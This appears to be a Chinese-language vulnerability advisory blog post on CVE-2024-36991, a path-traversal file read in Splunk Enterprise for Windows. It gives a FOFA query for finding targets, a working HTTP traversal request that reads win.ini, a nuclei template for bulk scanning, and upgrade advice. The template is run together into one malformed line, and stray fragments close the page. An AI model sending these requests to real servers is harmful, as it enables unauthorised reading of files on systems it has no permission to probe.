文章目錄
- 前言
- 漏洞描述
- 影響版本
- 漏洞復現
- POC
- 批量檢測-nuclei腳本
- 修復建議
前言
Splunk Enterprise 是一款強大的機器數據管理和分析平臺,能夠實時收集、索引、搜索、分析和可視化來自各種數據源的日志和數據,幫助企業提升運營效率、增強安全性和優化業務決策。
| 漏洞名稱 | Splunk Enterprise 任意文件讀取漏洞 |
|---|---|
| 漏洞編號 | CVE-2024-36991 |
| 公開時間 | 2024-07-01 |
| 威脅類型 | 信息泄漏 |
漏洞描述
在特定版本的 Windows 版 Splunk Enterprise 中,未經身份認證的攻擊者可以在 /modules/messaging/ 接口通過目錄穿越的方式讀取任意文件,造成用戶信息的泄露。
影響版本
9.2 <= Splunk Enterprise < 9.2.2
9.1 <= Splunk Enterprise < 9.1.5
9.0 <= Splunk Enterprise < 9.0.10
漏洞復現
FOFA語法:
app="splunk-Enterprise"
POC
GET /zh-CN/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
批量檢測-nuclei腳本
id: CVE-2024-36991info:name: Splunk Enterprise for Windows 任意文件讀取漏洞author: whgojpdescription: Splunk Enterprise 是一款強大的數據分析軟件,它允許用戶從各種來源收集、索引和搜索機器生成的數據。2024年7月,官方發布安全通告,披露 CVE-2024-36991 Splunk Enterprise Windows平臺 modules/messaging 目錄遍歷漏洞。漏洞僅影響 Windows平臺上的 Splunk Enterprise,官方已發布安全更新,建議升級至最新版本。reference:- https://advisory.splunk.com/SVD-2024-0711tags: cve,cve2024,splunk-Enterprisrequests:- method: GETpath:- "{{BaseURL}}/zh-CN/modules/messaging/{{Path}}"matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "NetSetup.log"part: bodycondition: or- type: wordwords:- "Windows"- "debug"part: bodycondition: orvariables:Path:- "C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini"修復建議
目前官方已有可更新版本,建議受影響用戶升級至最新版本:
Splunk Enterprise 9.2.2
Splunk Enterprise 9.1.5
Splunk Enterprise 9.0.10
官方地址:https://www.splunk.com/zh_cn/download.html
)
及其Python和MATLAB實現)